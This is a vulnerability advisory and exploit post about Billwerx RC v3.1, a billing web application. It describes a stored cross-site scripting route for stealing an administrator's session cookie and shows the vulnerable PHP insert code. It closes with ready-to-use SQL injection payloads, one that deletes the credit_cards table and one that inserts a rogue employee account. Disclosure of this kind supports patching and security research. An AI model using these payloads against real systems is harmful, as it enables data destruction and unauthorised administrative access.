################################################################# # # Billwerx RC v3.1 Multiple Vulnerabilities # Found By: mr_me # Download: http://www.billwerx.com/download.php # Tested On: Windows Vista # Note: For educational purposes only # ################################################################# XSS POC: A regular employee can embed javascript code that could be executed within the context of the admin's browser. If the user edits their own profile by going to "http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2" and places "" into any of the following fields: 'firstname', 'billing address', 'billing city', 'billing province', 'billing postal', 'billing country' and then gives the following link to the admin: http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2 The user could potentially log the admins cookie and reset their own session thus gaining administration access. SQL Injection POC: http://127.0.0.1/billwerx_public_beta/employees/company_files.php You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1 Here you can see in the code snip that the description post value is unsanitized. 8<-------------snip-------------8< $description = strtolower($_POST['description']); $employee_id = $_SESSION['employee_id']; $readfile = fopen($temp_name, 'r'); $content = fread($readfile, filesize($temp_name)); $content = addslashes($content); fclose($readfile); # Assign values to a database table: $doSQL = "INSERT INTO company_files (name, size, type, content, public, description, employee_id) VALUES ('$name', '$size', '$type', '$content', '$public', '$description', '$employee_id')"; 8<-------------snip-------------8< SQL Injection exploit: ','1'); DELETE FROM credit_cards;/* or ','1'); insert into employees values (4, 'mr_me', 'hello', '', '', '', '', '', 'mr_me@hax0r.com', 'lol_mypassword', 0.00, 3, '', '', '', '', '', '2009-07-28 10:47:59');/*